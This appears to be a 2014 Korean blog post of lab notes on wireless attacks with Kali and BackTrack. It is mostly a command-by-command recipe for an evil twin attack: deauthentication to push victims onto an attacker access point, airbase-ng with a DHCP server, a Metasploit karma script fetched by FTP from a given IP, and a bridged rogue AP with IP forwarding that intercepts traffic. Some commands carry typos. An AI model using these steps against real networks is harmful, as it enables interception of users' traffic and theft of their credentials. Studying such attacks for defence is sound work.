2014. 10. 23. 15:33
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

phising 

동일한 ssid -> dos공격은 5회가 가장 적당 -> 끊어졌다가 다시 붙으면서 공격자의 AP로 붙음 


파일을 다운 받으라, 로딩한다고 나옴 




백트랙/ 칼리마다 방식이 조금 다름 


기존 방법에선 dhcp3-server를 사용했으나 

칼리에서는 isc-dhcp-server를 사용 해야 함 



dhclient eth0

install dhcp3-server


vi /etc/dhcp3/dhcpd.conf  에 덮어쓰기 



ssid 생성

airbase-ng -P -C3- -e "사용할 SSID" -v mon0  -> at0 가상 인터페이스가 생김 

-> airbase를 취소하면 사라짐 


gateway IP 설정

ifconfig at0 up 10.0.0.1 netmast 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 

ifconfig at0





권한설정

mkdir -p /var/run/dhcpd && chown dhcpd.dhcpd /var/run/dhcpd

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0





-----------



airmon-ng stsart wlan0

dhclient eth0


apt-get install isc-dhcp-server

ftp 61.76.181.14


get karma.rc

get dhcpd.conf


airbase-ng -c 1 -e 가상의 SSID -y -v mon0

-c  -> 채널 

-e  -> ssid


ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1


cp dhcpd.conf /etc/dhcp/

/etc/init.d/isc-dhcp-server restart


msfconsole -r karma.rc




-> 끊어 졌다 다시 붙을때 어디로 붙을지 모름 

-> 무선 ssid를 여러개 만들어 뿌리는 방법이 있지만 비추 



-> 전체 스캔을하면 채널이 돌기 때문에 공격이 잘 안 됨 

-> 채널 고정하여 덤프 모니터해야 함 


-------------


Rougue AP 


칼리 brctl 명령어가 없음 -> apt-get install bridge-utils


iwconfig 

airmon-ng start wlan0

airbase-ng -c 1 --essid 무선 네트워크이름 -y -v mon0

brctl addbr [네트워크 브릿지 이름]

brctl addif [네트워크 브릿지 이름] eth0

brctl addif [네트워크 브릿지 이름] at0

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

dhclient [네트워크 브릿지 이름]

echo 1 > /proc/sys/net/ipv4/ip_forward




칼리.txt






'Wireless' 카테고리의 다른 글

air defence  (0) 2014.10.27
firewall & encryption and project features  (0) 2014.10.24
WPA / WEP packet decoding  (0) 2014.10.22
WEP / WPA crack  (0) 2014.10.21
802.11 frame and types of attacks  (0) 2014.10.17
Posted by af334